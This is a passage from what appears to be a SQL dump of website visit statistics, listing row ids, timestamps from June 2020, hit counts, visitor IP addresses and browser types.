'other'),(514333,1592373441,1,1,0,0,'91.196.178.176','chrome'),(514334,1592373543,1,1,0,0,'66.249.70.72','chrome'),(514335,1592373833,1,1,0,0,'66.249.64.38','chrome'),(514336,1592373874,1,1,0,0,'193.194.127.144','chrome'),(514337,1592374445,1,1,0,0,'157.55.39.52','other'),(514338,1592374792,8,8,0,0,'185.11.82.228','other'),(514339,1592374838,1,1,0,0,'66.249.70.69','chrome'),(514340,1592375442,1,1,0,0,'91.196.178.176','chrome'),(514341,1592375539,1,1,0,0,'66.249.70.70','chrome'),(514342,1592375982,2,2,0,0,'66.249.70.69','chrome'),(514343,1592376144,1,1,0,0,'178.154.200.191','other'),(514344,1592376199,1,1,0,0,'37.53.228.153','chrome'),(514345,1592376235,8,8,0,0,'185.11.82.228','other'),(514346,1592376258,1,1,0,0,'213.180.203.16','other'),(514347,1592376505,1,1,0,0,'178.154.200.243','other'),(514348,1592376642,2,2,0,0,'178.154.200.222','other'),(514349,1592376902,1,1,0,0,'66.249.64.38','chrome'),(514350,1592377536,2,2,0,0,'162.247.97.185','chrome'),(514351,1592377700,1,1,0,0,'185.49.20.76','chrome'),(514352,1592377706,8,8,0,0,'185.11.82.228','other'),(514353,1592377917,1,1,0,0,'37.32.98.127','chrome'),(514354,1592377920,1,1,0,0,'178.208.83.57','chrome'),(514355,1592377977,2,2,0,0,'195.10.210.98','chrome'),(514356,1592377992,2,2,0,0,'35.208.193.163','chrome'),(514357,1592378353,1,1,0,0,'213.180.203.95','other'),(514358,1592378560,1,1,0,0,'17.58.99.7','other'),(514359,1592378769,1,1,0,0,'157.55.39.52','other'),(514360,1592379004,1,1,0,0,'91.124.238.246','chrome'),(514361,1592379105,1,1,0,0,'8.29.198.26','other'),(514362,1592379127,1,1,0,0,'8.29.198.25','other'),(514363,1592379178,8,8,0,0,'185.11.82.228','other'),(514364,1592379438,1,1,0,0,'131.220.6.152','chrome'),(514365,1592379571,1,1,0,0,'17.58.99.7','other'),(514366,1592379597,1,1,0,0,'91.196.178.80','chrome'),(514367,1592379869,1,1,0,0,'157.230.255.113','chrome'),(514369,1592379908,1,1,0,0,'77.221.130.146','chrome'),(514370,1592380006,2,2,0,0,'45.199.109.170','chrome'),(514371,1592380220,2,2,0,0,'66.249.70.72','chrome'),(514372,1592380592,3,3,0,0,'91.196.179.33','chrome'),(514373,1592380667,8,8,0,0,'185.11.82.228','other'),(514374,1592380685,1,1,0,0,'178.154.200.245','other'),(514375,1592380909,1,1,0,0,'95.158.42.161','chrome'),(514376,1592381147,1,1,0,0,'91.196.178.89','chrome'),(514377,1592381154,1,1,0,0,'66.249.70.70','chrome'),(514378,1592381437,1,1,0,0,'176.120.37.220','firefox'),(514379,1592381537,1,1,0,0,'91.196.178.176','chrome'),(514380,1592381727,2,2,0,0,'157.55.39.52','other'),(514381,1592381953,1,1,0,0,'91.196.178.187','chrome'),(514382,1592382163,8,8,0,0,'185.11.82.228','other'),(514383,1592382166,1,1,0,0,'209.17.96.18','other'),(514384,1592382323,1,1,0,0,'91.196.178.179','chrome'),(514385,1592382719,1,1,0,0,'66.249.70.72','chrome'),(514386,1592382927,1,1,0,0,'91.196.178.74','chrome'),(514387,1592383169,1,1,0,0,'94.153.18.7','chrome'),(514388,1592383615,8,8,0,0,'185.11.82.228','other'),(514389,1592383686,1,1,0,0,'66.249.64.36','chrome'),(514390,1592383781,1,1,0,0,'40.80.152.98','other'),(514391,1592383906,1,1,0,0,'85.115.62.180','chrome'),(514392,1592383982,1,1,0,0,'66.249.64.38','chrome'),(514393,1592384257,1,1,0,0,'178.251.106.169','chrome'),(514394,1592384904,2,2,0,0,'66.249.70.69','chrome'),(514395,1592385102,8,8,0,0,'185.11.82.228','other'),(514396,1592385962,2,2,0,0,'66.249.70.70','chrome'),(514397,1592386007,1,1,0,0,'3.136.159.214','chrome'),(514398,1592386240,1,1,0,0,'213.180.203.16','other'),(514399,1592386605,1,1,0,0,'178.92.170.144','chrome'),(514400,1592386654,8,8,0,0,'185.11.82.228','other'),(514401,1592387244,1,1,0,0,'66.249.64.46','chrome'),(514402,1592387788,1,1,0,0,'17.58.99.7','other'),(514403,1592388138,2,2,0,0,'95.133.152.102','chrome'),(514404,1592388242,8,8,0,0,'185.11.82.228','other'),(514405,1592388517,2,2,0,0,'178.154.200.220','other'),(514406,1592388765,1,1,0,0,'66.249.70.72','chrome'),(514407,1592389064,2,2,0,0,'66.249.70.70','chrome'),(514408,1592389193,1,1,0,0,'207.46.13.214','other'),(514409,1592389252,2,2,0,0,'66.249.70.69','chrome'),(514410,1592389594,1,1,0,0,'157.55.39.52','other'),(514411,1592389763,8,8,0,0,'185.11.82.228','other'),(514412,1592389939,2,2,0,0,'8.29.198.27','other'),(514413,1592389979,1,1,0,0,'31.43.18.58','other'),(514414,1592390006,1,1,0,0,'178.154.200.92','other'),(514415,1592390369,2,2,0,0,'66.249.64.36','chrome'),(514416,1592390469,1,1,0,0,'109.74.154.72','chrome'),(514417,1592390967,1,1,0,0,'91.196.178.153','firefox'),(514418,1592391001,4,3,1,0,'66.249.70.69',''),(514419,1592391059,3,3,0,0,'66.249.70.70','chrome'),(514420,1592391275,8,8,0,0,'185.11.82.228','other'),(514421,1592391314,1,1,0,0,'207.46.13.243','other'),(514422,1592391767,1,1,0,0,'178.154.200.196','other'),(514423,1592391778,1,1,0,0,'207.46.13.214','other'),(514424,1592391885,1,1,0,0,'95.133.152.102','chrome'),(514425,1592392232,2,2,0,0,'95.213.141.126','opera'),(514426,1592392551,1,1,0,0,'94.178.147.163','chrome'),(514427,1592392847,8,8,0,0,'185.11.82.228','other'),(514428,1592392865,1,1,0,0,'157.55.39.52','other'),(514429,1592393158,2,2,0,0,'207.46.13.243','other'),(514430,1592393264,1,1,0,0,'207.46.13.214','other'),(514431,1592393792,1,1,0,0,'212.87.168.141','chrome'),(514432,1592393814,1,1,0,0,'95.134.117.121','chrome'),(514433,1592393875,1,1,0,0,'178.154.200.220','other'),(514434,1592394021,2,2,0,0,'66.249.70.70','chrome'),(514435,1592394398,8,8,0,0,'185.11.82.228','other'),(514436,1592394535,1,1,0,0,'66.249.70.72','chrome'),(514437,1592395199,1,1,0,0,'95.46.198.25','firefox'),(514438,1592395232,1,1,0,0,'207.46.13.214','other'),(514439,1592395451,2,2,0,0,'66.249.70.69','chrome'),(514440,1592395589,1,1,0,0,'66.249.70.72','chrome'),(514441,1592395651,1,1,0,0,'66.249.70.70','chrome'),(514442,1592395704,1,1,0,0,'66.249.64.36','chrome'),(514443,1592395809,2,2,0,0,'157.55.39.52','other'),(514444,1592395943,8,8,0,0,'185.11.82.228','other'),(514445,1592396468,1,1,0,0,'178.154.200.222','other'),(514446,1592396505,2,2,0,0,'207.46.13.214','other'),(514447,1592396584,1,1,0,0,'213.180.203.17','other'),(514448,1592396932,6,6,0,0,'66.249.70.69','chrome'),(514449,1592396945,3,3,0,0,'66.249.70.72','chrome'),(514450,1592396974,2,2,0,0,'66.249.70.70','chrome'),(514451,1592397090,1,1,0,0,'185.11.29.169','chrome'),(514452,1592397262,1,1,0,0,'66.249.64.33','chrome'),(514453,1592397402,1,1,0,0,'207.46.13.243','other'),(514454,1592397406,1,1,0,0,'207.46.13.214','other'),(514455,1592397412,2,2,0,0,'157.55.39.52','other'),(514456,1592397518,8,8,0,0,'185.11.82.228','other'),(514457,1592397706,1,1,0,0,'91.196.178.176','chrome'),(514458,1592397818,2,2,0,0,'66.249.64.36','chrome'),(514459,1592397849,10,10,0,0,'66.249.70.69','chrome'),(514460,1592397954,4,4,0,0,'66.249.70.70','chrome'),(514461,1592398098,1,1,0,0,'66.249.64.38','chrome'),(514462,1592398131,1,1,0,0,'185.11.29.169','chrome'),(514463,1592398752,8,8,0,0,'66.249.70.69','chrome'),(514464,1592398766,1,1,0,0,'91.196.178.176','chrome'),(514465,1592398783,1,1,0,0,'157.55.39.52','other'),(514466,1592398801,4,4,0,0,'66.249.70.72','chrome'),(514467,1592398840,1,1,0,0,'95.135.135.20','chrome'),(514468,1592398866,3,3,0,0,'66.249.70.70','chrome'),(514469,1592398905,1,1,0,0,'207.46.13.243','other'),(514470,1592399090,8,8,0,0,'185.11.82.228','other'),(514471,1592399215,2,2,0,0,'66.249.64.36','chrome'),(514472,1592399744,1,1,0,0,'207.46.13.214','other'),(514473,1592399836,4,4,0,0,'66.249.70.70','chrome'),(514474,1592399854,3,2,1,0,'66.249.70.69',''),(514475,1592400038,1,1,0,0,'194.61.24.94','other'),(514476,1592400053,2,1,1,0,'66.249.70.72',''),(514477,1592400757,4,4,0,0,'66.249.70.72','chrome'),(514478,1592400760,8,8,0,0,'185.11.82.228','other'),(514479,1592400772,1,1,0,0,'8.29.198.25','other'),(514480,1592400798,1,1,0,0,'8.29.198.27','other'),(514481,1592400865,1,1,0,0,'17.58.99.7','other'),(514482,1592400900,2,2,0,0,'66.249.64.33','chrome'),(514483,1592401285,2,2,0,0,'66.249.70.70','chrome'),(514484,1592401322,2,2,0,0,'66.249.70.69','chrome'),(514485,1592401432,1,1,0,0,'91.196.178.59','chrome'),(514486,1592401449,1,1,0,0,'66.249.64.38','chrome'),(514487,1592401599,1,1,0,0,'213.180.203.16','other'),(514488,1592401708,1,1,0,0,'66.249.70.72','chrome'),(514489,1592402271,1,1,0,0,'66.249.64.33','chrome'),(514490,1592402451,8,8,0,0,'185.11.82.228','other'),(514491,1592403498,1,1,0,0,'66.249.70.70','chrome'),(514492,1592403506,1,1,0,0,'66.249.70.69','chrome'),(514493,1592403661,1,1,0,0,'66.249.64.38','chrome'),(514494,1592404126,8,8,0,0,'185.11.82.228','other'),(514495,1592404735,1,1,0,0,'17.58.99.7','other'),(514496,1592405083,2,2,0,0,'66.249.70.72','chrome'),(514497,1592405587,1,1,0,0,'207.46.13.214','other'),(514498,1592405775,8,8,0,0,'185.11.82.228','other'),(514499,1592405841,1,1,0,0,'66.249.64.33','chrome'),(514500,1592406248,1,1,0,0,'207.46.13.243','other'),(514501,1592406480,5,5,0,0,'66.249.70.72','chrome'),(514502,1592406594,1,1,0,0,'193.106.30.99','firefox'),(514503,1592406717,2,2,0,0,'66.249.70.70','chrome'),(514504,1592406742,1,1,0,0,'66.249.70.69','chrome'),(514505,1592407220,1,1,0,0,'157.55.39.52','other'),(514506,1592407425,8,8,0,0,'185.11.82.228','other'),(514507,1592407791,1,1,0,0,'66.249.70.69','chrome'),(514508,1592407920,1,1,0,0,'17.58.99.7','other'),(514509,1592408617,1,1,0,0,'207.46.13.243','other'),(514510,1592408822,2,2,0,0,'157.55.39.52','other'),(514511,1592409027,8,8,0,0,'185.11.82.228','other'),(514512,1592409079,1,1,0,0,'66.249.70.70','chrome'),(514513,1592409403,2,2,0,0,'66.249.70.72','chrome'),(514514,1592410540,1,1,0,0,'188.239.236.210','chrome'),(514515,1592410747,8,8,0,0,'185.11.82.228','other'),(514516,1592411225,2,2,0,0,'17.58.99.7','other'),(514517,1592411355,1,1,0,0,'157.55.39.52','other'),(514518,1592411516,1,1,0,0,'66.249.70.70','chrome'),(514519,1592411618,1,1,0,0,'8.29.198.26','other'),(514520,1592411629,1,1,0,0,'8.29.198.25','other'),(514521,1592412472,8,8,0,0,'185.11.82.228','other'),(514522,1592412823,1,1,0,0,'138.246.253.15','chrome'),(514523,1592413053,1,1,0,0,'66.249.70.70','chrome'),(514524,1592413462,1,1,0,0,'66.102.9.169','chrome'),(514525,1592413806,1,1,0,0,'157.55.39.52','other'),(514526,1592414242,1,1,0,0,'66.249.70.70','chrome'),(514527,1592414357,8,8,0,0,'185.11.82.228','other'),(514528,1592414769,4,4,0,0,'66.249.70.69','chrome'),(514529,1592415983,8,8,0,0,'185.11.82.228','other'),(514530,1592416048,2,2,0,0,'66.249.70.70','chrome'),(514531,1592416293,1,1,0,0,'138.246.253.15','chrome'),(514532,1592417046,1,1,0,0,'157.55.39.52','other'),(514533,1592417093,2,2,0,0,'66.249.70.72','chrome'),(514534,1592417686,8,8,0,0,'185.11.82.228','other'),(514535,1592417805,2,2,0,0,'207.46.13.214','other'),(514536,1592417907,4,4,0,0,'66.249.70.70','chrome'),(514537,1592418006,1,1,0,0,'66.249.70.72','chrome'),(514538,1592418960,1,1,0,0,'66.249.70.72','chrome'),(514539,1592419050,1,1,0,0,'66.249.64.33','chrome'),(514540,1592419433,8,8,0,0,'185.11.82.228','other'),(514541,1592419902,1,1,0,0,'51.68.11.215','chrome'),(514542,1592419988,1,1,0,0,'94.20.62.62','chrome'),(514543,1592420036,2,2,0,0,'66.249.70.72','chrome'),(514544,1592420270,1,1,0,0,'91.196.178.6','chrome'),(514545,1592420340,1,1,0,0,'207.46.13.214','other'),(514546,1592421110,2,2,0,0,'66.249.70.70','chrome'),(514547,1592421164,8,8,0,0,'185.11.82.228','other'),(514548,1592421805,1,1,0,0,'207.46.13.214','other'),(514549,1592421910,1,1,0,0,'207.46.13.243','other'),(514550,1592421988,1,1,0,0,'45.136.108.44','other'),(514551,1592422412,1,1,0,0,'66.249.64.36','chrome'),(514552,1592422444,1,1,0,0,'66.249.70.69','chrome'),(514553,1592422452,2,2,0,0,'8.29.198.27','other'),(514554,1592422873,8,8,0,0,'185.11.82.228','other'),(514555,1592423075,1,1,0,0,'66.249.70.72','chrome'),(514556,1592423264,1,1,0,0,'88.155.44.153','chrome'),(514557,1592423564,1,1,0,0,'157.55.39.52','other'),(514558,1592423675,2,2,0,0,'23.235.157.104','chrome'),(514559,1592424256,2,2,0,0,'66.249.64.36','chrome'),(514560,1592424258,2,2,0,0,'66.249.70.72','chrome'),(514561,1592424365,8,8,0,0,'185.11.82.228','other'),(514562,1592424800,1,1,0,0,'198.38.82.11','chrome'),(514563,1592425577,1,1,0,0,'91.209.11.236','other'),(514564,1592425611,2,2,0,0,'51.68.11.227','chrome'),(514565,1592426093,8,8,0,0,'185.11.82.228','other'),(514566,1592426971,1,1,0,0,'157.55.39.52','other'),(514567,1592427079,2,2,0,0,'66.249.70.70','chrome'),(514568,1592427349,1,1,0,0,'66.249.70.69','chrome'),(514569,1592427610,1,1,0,0,'178.208.83.20','chrome'),(514570,1592427633,1,1,0,0,'91.209.11.236','other'),(514571,1592427714,1,1,0,0,'183.136.225.46','firefox'),(514572,1592427810,1,1,0,0,'51.68.11.227','chrome'),(514573,1592427844,8,8,0,0,'185.11.82.228','other'),(514574,1592427898,1,1,0,0,'91.196.178.30','chrome'),(514575,1592428432,1,1,0,0,'207.46.13.243','other'),(514576,1592428623,1,1,0,0,'91.209.11.236','other'),(514577,1592429168,1,1,0,0,'66.249.70.72','chrome'),(514578,1592429467,8,8,0,0,'185.11.82.228','other'),(514579,1592429550,1,1,0,0,'91.209.11.236','other'),(514580,1592429567,1,1,0,0,'108.175.9.28','chrome'),(514581,1592429812,1,1,0,0,'17.58.99.7','other'),(514582,1592429844,2,2,0,0,'217.29.63.235','chrome'),(514583,1592429858,1,1,0,0,'207.46.13.243','other'),(514584,1592429936,2,2,0,0,'51.68.11.215','chrome'),(514585,1592430656,1,0,1,0,'66.249.70.72',''),(514586,1592431128,8,8,0,0,'185.11.82.228','other'),(514587,1592431786,1,1,0,0,'91.209.11.236','other'),(514588,1592432784,8,8,0,0,'185.11.82.228','other'),(514589,1592432877,1,1,0,0,'91.209.11.236','other'),(514590,1592432889,1,1,0,0,'157.55.39.52','other'),(514591,1592433024,1,1,0,0,'66.249.64.36','chrome'),(514592,1592433286,1,1,0,0,'8.29.198.25','other'),(514593,1592433288,1,1,0,0,'8.29.198.26','other'),(514594,1592433311,2,2,0,0,'51.68.11.207','chrome'),(514595,1592433417,1,1,0,0,'199.116.78.83','chrome'),(514596,1592433658,1,1,0,0,'35.213.146.206','chrome'),(514597,1592433732,1,1,0,0,'66.249.64.38','chrome'),(514598,1592433829,1,1,0,0,'207.46.13.214','other'),(514599,1592433999,1,1,0,0,'91.209.11.236','other'),(514600,1592434278,1,1,0,0,'66.249.64.36','chrome'),(514601,1592434482,8,8,0,0,'185.11.82.228','other'),(514602,1592434634,1,1,0,0,'157.55.39.52','other'),(514603,1592435077,1,1,0,0,'66.249.70.69','chrome'),(514604,1592435225,2,2,0,0,'207.46.13.214','other'),(514605,1592435424,1,1,0,0,'51.68.11.207','chrome'),(514606,1592435520,1,1,0,0,'31.177.95.22','chrome'),(514607,1592435522,2,2,0,0,'91.209.11.236','other'),(514608,1592435656,3,3,0,0,'186.202.153.166','chrome'),(514609,1592436103,1,1,0,0,'66.249.70.69','chrome'),(514610,1592436116,8,8,0,0,'185.11.82.228','other'),(514611,1592436393,1,1,0,0,'66.249.70.70','chrome'),(514612,1592436861,1,1,0,0,'13.66.139.0','other'),(514613,1592437282,1,1,0,0,'66.249.64.33','chrome'),(514614,1592437306,2,2,0,0,'162.241.5.177','chrome'),(514615,1592437340,2,2,0,0,'51.68.11.203','chrome'),(514616,1592437385,1,1,0,0,'88.198.117.8','chrome'),(514617,1592437448,1,1,0,0,'91.209.11.236','other'),(514618,1592437488,1,1,0,0,'66.249.70.69','chrome'),(514619,1592437759,8,8,0,0,'185.11.82.228','other'),(514620,1592438106,1,1,0,0,'62.205.134.182','other'),(514621,1592438261,1,1,0,0,'66.249.64.38','chrome'),(514622,1592438604,1,1,0,0,'91.209.11.236','other'),(514623,1592438616,1,1,0,0,'66.249.70.72','chrome'),(514624,1592438712,1,1,0,0,'66.249.70.69','chrome'),(514625,1592438960,1,1,0,0,'89.46.104.200','chrome'),(514626,1592439316,1,1,0,0,'81.88.49.3','chrome'),(514627,1592439319,1,1,0,0,'81.88.49.25','chrome'),(514628,1592439382,1,1,0,0,'66.249.64.33','chrome'),(514629,1592439384,8,8,0,0,'185.11.82.228','other'),(514630,1592439536,1,1,0,0,'51.68.11.223','chrome'),(514631,1592439754,1,1,0,0,'91.209.11.236','other'),(514632,1592440080,2,2,0,0,'66.249.70.72','chrome'),(514633,1592440284,1,1,0,0,'207.46.13.214','other'),(514634,1592440961,1,1,0,0,'91.209.11.236','other'),(514635,1592440965,8,8,0,0,'185.11.82.228','other'),(514636,1592441096,2,2,0,0,'128.199.65.117','chrome'),(514637,1592441160,1,1,0,0,'207.46.13.243','other'),(514638,1592441186,2,2,0,0,'51.68.11.195','chrome'),(514639,1592441877,1,1,0,0,'66.249.70.69','chrome'),(514640,1592442076,2,2,0,0,'66.249.70.72','chrome'),(514641,1592442449,1,1,0,0,'66.249.70.70','chrome'),(514642,1592442567,1,1,0,0,'66.249.64.38','chrome'),(514643,1592442688,8,8,0,0,'185.11.82.228','other'),(514644,1592443120,1,1,0,0,'51.68.11.215','chrome'),(514645,1592443235,1,1,0,0,'207.46.13.214','other'),(514646,1592443273,1,1,0,0,'66.249.70.69','chrome'),(514647,1592443326,1,1,0,0,'91.209.11.236','other'),(514648,1592443549,1,1,0,0,'157.55.39.52','other'),(514649,1592443642,3,3,0,0,'66.249.70.70','chrome'),(514650,1592444115,1,1,0,0,'8.29.198.27','other'),(514651,1592444116,1,1,0,0,'8.29.198.26','other'),(514652,1592444383,8,8,0,0,'185.11.82.228','other'),(514653,1592444474,1,1,0,0,'91.209.11.236','other'),(514654,1592445022,2,2,0,0,'66.249.64.38','chrome'),(514655,1592445039,1,1,0,0,'66.249.70.69','chrome'),(514656,1592445074,1,1,0,0,'198.38.82.11','chrome'),(514657,1592445123,2,2,0,0,'66.249.70.70','chrome'),(514658,1592445251,1,1,0,0,'17.58.99.7','other'),(514659,1592445393,1,1,0,0,'51.68.11.203','chrome'),(514660,1592445660,1,1,0,0,'5.153.24.46','chrome'),(514661,1592445762,1,1,0,0,'91.209.11.236','other'),(514662,1592445765,2,1,1,0,'66.249.70.72',''),(514663,1592446135,8,8,0,0,'185.11.82.228','other'),(514664,1592446219,3,3,0,0,'66.249.70.69','chrome'),(514665,1592446390,2,2,0,0,'66.249.70.72','chrome'),(514666,1592446481,1,1,0,0,'178.154.200.222','other'),(514667,1592446585,4,4,0,0,'66.249.70.70','chrome'),(514668,1592446647,2,2,0,0,'35.247.153.104','chrome'),(514669,1592446686,2,2,0,0,'5.9.97.115','chrome'),(514670,1592446851,2,2,0,0,'203.217.140.107','chrome'),(514671,1592447059,1,1,0,0,'91.209.11.236','other'),(514672,1592447481,2,2,0,0,'66.249.64.38','chrome'),(514673,1592447625,1,1,0,0,'66.249.64.36','chrome'),(514674,1592447715,5,5,0,0,'66.249.70.69','chrome'),(514675,1592447799,6,6,0,0,'66.249.70.70','chrome'),(514676,1592447876,8,8,0,0,'185.11.82.228','other'),(514677,1592448034,2,2,0,0,'66.249.70.72','chrome'),(514678,1592448042,1,1,0,0,'157.55.39.52','other'),(514679,1592448219,1,1,0,0,'91.209.11.236','other'),(514680,1592448483,1,1,0,0,'198.71.226.46','chrome'),(514681,1592448716,1,1,0,0,'109.70.3.170','chrome'),(514682,1592449078,1,1,0,0,'207.46.13.243','other'),(514683,1592449413,1,1,0,0,'91.209.11.236','other'),(514684,1592449679,8,8,0,0,'185.11.82.228','other'),(514685,1592450389,2,2,0,0,'66.249.70.70','chrome'),(514686,1592450447,2,2,0,0,'45.76.213.227','chrome'),(514687,1592450457,1,1,0,0,'91.209.11.236','other'),(514688,1592450490,2,2,0,0,'110.49.59.168','chrome'),(514689,1592450569,2,2,0,0,'132.148.35.84','chrome'),(514690,1592450651,1,1,0,0,'89.46.104.172','chrome'),(514691,1592450664,1,1,0,0,'132.148.251.230','chrome'),(514692,1592450893,1,1,0,0,'66.249.64.36','chrome'),(514693,1592451055,1,1,0,0,'37.52.114.132','chrome'),(514694,1592451330,1,1,0,0,'66.249.70.70','chrome'),(514695,1592451396,1,1,0,0,'91.209.11.236','other'),(514696,1592451492,2,2,0,0,'66.249.70.69','chrome'),(514697,1592451778,8,8,0,0,'185.11.82.228','other'),(514698,1592452312,2,2,0,0,'91.209.11.236','other'),(514699,1592452393,2,2,0,0,'66.249.70.70','chrome'),(514700,1592452618,1,1,0,0,'66.249.70.69','chrome'),(514701,1592452971,1,1,0,0,'66.249.64.38','chrome'),(514702,1592453247,2,2,0,0,'66.249.70.72','chrome'),(514703,1592453818,1,0,1,0,'66.249.70.69',''),(514704,1592453904,8,8,0,0,'185.11.82.228','other'),(514705,1592454067,1,1,0,0,'91.209.11.236','other'),(514706,1592454941,1,1,0,0,'8.29.198.25','other'),(514707,1592454944,1,1,0,0,'8.29.198.27','other'),(514708,1592454981,2,2,0,0,'66.249.70.69','chrome'),(514709,1592455035,1,1,0,0,'91.209.11.236','other'),(514710,1592455131,1,1,0,0,'66.249.70.70','chrome'),(514711,1592455340,1,1,0,0,'91.196.178.29','firefox'),(514712,1592455872,1,1,0,0,'62.205.134.182','other'),(514713,1592455931,8,8,0,0,'185.11.82.228','other'),(514714,1592456027,1,1,0,0,'66.249.64.38','chrome'),(514715,1592456046,1,1,0,0,'91.209.11.236','other'),(514716,1592456075,1,1,0,0,'66.249.70.72','chrome'),(514717,1592456502,1,1,0,0,'66.249.70.69','chrome'),(514718,1592456965,1,1,0,0,'91.209.11.236','other'),(514719,1592457166,1,1,0,0,'66.249.64.38','chrome'),(514720,1592457772,1,1,0,0,'89.46.105.178','chrome'),(514721,1592457908,1,1,0,0,'51.68.11.199','chrome'),(514722,1592457971,8,8,0,0,'185.11.82.228','other'),(514723,1592457972,1,1,0,0,'91.209.11.236','other'),(514724,1592458065,1,1,0,0,'66.249.70.70','chrome'),(514725,1592458665,1,1,0,0,'66.249.70.69','chrome'),(514726,1592458777,1,1,0,0,'66.249.70.72','chrome'),(514727,1592458913,1,1,0,0,'91.209.11.236','other'),(514728,1592459103,1,1,0,0,'80.85.156.55','chrome'),(514729,1592459428,1,1,0,0,'3.220.157.99','chrome'),(514730,1592459566,2,2,0,0,'207.46.13.214','other'),(514731,1592459908,1,1,0,0,'91.209.11.236','other'),(514732,1592459963,51,51,0,0,'5.9.154.69','other'),(514733,1592460103,8,8,0,0,'185.11.82.228','other'),(514734,1592460158,1,1,0,0,'178.154.200.175','other'),(514735,1592460715,1,1,0,0,'157.55.39.52','other'),(514736,1592460791,1,1,0,0,'81.88.49.48','chrome'),(514737,1592460894,1,1,0,0,'91.209.11.236','other'),(514738,1592461066,1,1,0,0,'66.249.64.36','chrome'),(514739,1592461205,1,1,0,0,'66.249.70.72','chrome'),(514740,1592461385,2,2,0,0,'128.199.65.117','chrome'),(514741,1592461941,1,1,0,0,'91.209.11.236','other'),(514742,1592461949,1,1,0,0,'178.159.37.88','chrome'),(514743,1592462356,8,8,0,0,'185.11.82.228','other'),(514744,1592462365,1,1,0,0,'157.55.39.52','other'),(514745,1592462608,3,3,0,0,'66.249.70.70','chrome'),(514746,1592462813,1,1,0,0,'96.47.227.216','chrome'),(514747,1592462986,1,1,0,0,'91.209.11.236','other'),(514748,1592463000,1,1,0,0,'212.90.190.6','chrome'),(514749,1592463131,3,3,0,0,'66.249.70.69','chrome'),(514750,1592463383,1,1,0,0,'207.46.13.243','other'),(514751,1592463406,1,1,0,0,'51.68.11.203','chrome'),(514752,1592463997,1,1,0,0,'91.209.11.236','other'),(514753,1592464046,1,1,0,0,'66.249.64.36','chrome'),(514754,1592464048,2,2,0,0,'66.249.70.70','chrome'),(514755,1592464432,2,2,0,0,'66.249.70.72','chrome'),(514756,1592464778,1,1,0,0,'17.58.99.7','other'),(514757,1592464821,8,8,0,0,'185.11.82.228','other'),(514758,1592464867,3,3,0,0,'103.224.80.3','chrome'),(514759,1592464999,1,1,0,0,'157.55.39.52','other'),(514760,1592465003,1,1,0,0,'207.46.13.243','other'),(514761,1592465009,1,1,0,0,'207.46.13.214','other'),(514762,1592465083,1,1,0,0,'91.209.11.236','other'),(514763,1592465556,1,1,0,0,'66.249.70.70','chrome'),(514764,1592465777,1,1,0,0,'8.29.198.25','other'),(514765,1592465784,1,1,0,0,'8.29.198.27','other'),(514766,1592465885,1,1,0,0,'131.220.6.152','chrome'),(514767,1592465894,1,1,0,0,'66.249.70.69','chrome'),(514768,1592465994,1,1,0,0,'207.46.13.214','other'),(514769,1592466091,1,1,0,0,'66.249.70.72','chrome'),(514770,1592466171,1,1,0,0,'213.180.203.16','other'),(514771,1592466190,1,1,0,0,'91.209.11.236','other'),(514772,1592466196,1,1,0,0,'178.154.200.222','other'),(514773,1592467215,8,8,0,0,'185.11.82.228','other'),(514774,1592467284,1,1,0,0,'91.209.11.236','other'),(514775,1592467603,1,1,0,0,'66.249.64.23','chrome'),(514776,1592467609,1,1,0,0,'213.180.203.16','other'),(514777,1592467620,1,1,0,0,'66.249.64.24','chrome'),(514778,1592467962,1,1,0,0,'85.25.237.25','chrome'),(514779,1592468008,1,1,0,0,'78.108.92.76','chrome'),(514780,1592468161,1,1,0,0,'37.53.89.92','chrome'),(514781,1592468530,1,1,0,0,'178.154.200.196','other'),(514782,1592469355,1,1,0,0,'94.124.1.224','chrome'),(514783,1592469459,1,1,0,0,'66.249.70.70','chrome'),(514784,1592469520,1,1,0,0,'91.209.11.236','other'),(514785,1592469601,8,8,0,0,'185.11.82.228','other'),(514786,1592469621,1,1,0,0,'208.109.53.211','chrome'),(514787,1592469725,2,2,0,0,'178.255.72.122','chrome'),(514788,1592469848,1,1,0,0,'66.249.64.36','chrome'),(514789,1592470268,1,1,0,0,'17.58.99.7','other'),(514790,1592470362,1,1,0,0,'207.46.13.243','other'),(514791,1592470466,1,1,0,0,'52.152.139.86','other'),(514792,1592470642,1,1,0,0,'91.209.11.236','other'),(514793,1592470933,7,7,0,0,'35.153.144.35','firefox'),(514794,1592471178,1,1,0,0,'66.249.64.36','chrome'),(514795,1592471285,1,1,0,0,'35.214.48.225','chrome'),(514796,1592471400,1,1,0,0,'157.55.39.52','other'),(514797,1592471453,1,1,0,0,'54.36.149.31','other'),(514798,1592471465,1,1,0,0,'66.249.70.69','chrome'),(514799,1592471646,2,2,0,0,'66.249.64.33','chrome'),(514800,1592471796,1,1,0,0,'91.209.11.236','other'),(514801,1592471912,1,1,0,0,'91.196.178.176','chrome'),(514802,1592471997,8,8,0,0,'185.11.82.228','other'),(514803,1592472215,2,2,0,0,'66.249.70.72','chrome'),(514804,1592472223,2,2,0,0,'66.249.70.70','chrome'),(514805,1592472359,5,5,0,0,'188.143.235.92','chrome'),(514806,1592472595,1,1,0,0,'66.249.64.36','chrome'),(514807,1592472884,2,2,0,0,'178.250.54.207','chrome'),(514808,1592473032,1,1,0,0,'3.220.157.99','chrome'),(514809,1592473133,2,1,1,0,'66.249.70.70',''),(514810,1592473331,1,1,0,0,'66.147.230.52','chrome'),(514811,1592473604,1,1,0,0,'207.46.13.243','other'),(514812,1592473835,4,4,0,0,'66.249.70.70','chrome'),(514813,1592473995,6,6,0,0,'66.249.70.69','chrome'),(514814,1592474029,1,1,0,0,'207.46.13.214','other'),(514815,1592474057,3,3,0,0,'66.249.70.72','chrome'),(514816,1592474119,1,1,0,0,'66.249.64.36','chrome'),(514817,1592474202,1,1,0,0,'91.209.11.236','other'),(514818,1592474278,8,8,0,0,'185.11.82.228','other'),(514819,1592475082,2,2,0,0,'66.249.64.36','chrome'),(514820,1592475085,5,5,0,0,'66.249.70.70','chrome'),(514821,1592475107,6,6,0,0,'66.249.70.69','chrome'),(514822,1592475381,1,1,0,0,'91.209.11.236','other'),(514823,1592475889,1,1,0,0,'18.217.191.59','chrome'),(514824,1592475912,1,1,0,0,'207.46.13.214','other'),(514825,1592476280,1,1,0,0,'204.12.208.154','other'),(514826,1592476375,1,1,0,0,'49.0.2.26','chrome'),(514827,1592476546,2,2,0,0,'157.55.39.52','other'),(514828,1592476610,1,1,0,0,'8.29.198.27','other'),(514829,1592476616,8,8,0,0,'185.11.82.228','other'),(514830,1592476626,1,1,0,0,'8.29.198.25','other'),(514831,1592476973,1,1,0,0,'66.249.64.38','chrome'),(514832,1592477274,1,1,0,0,'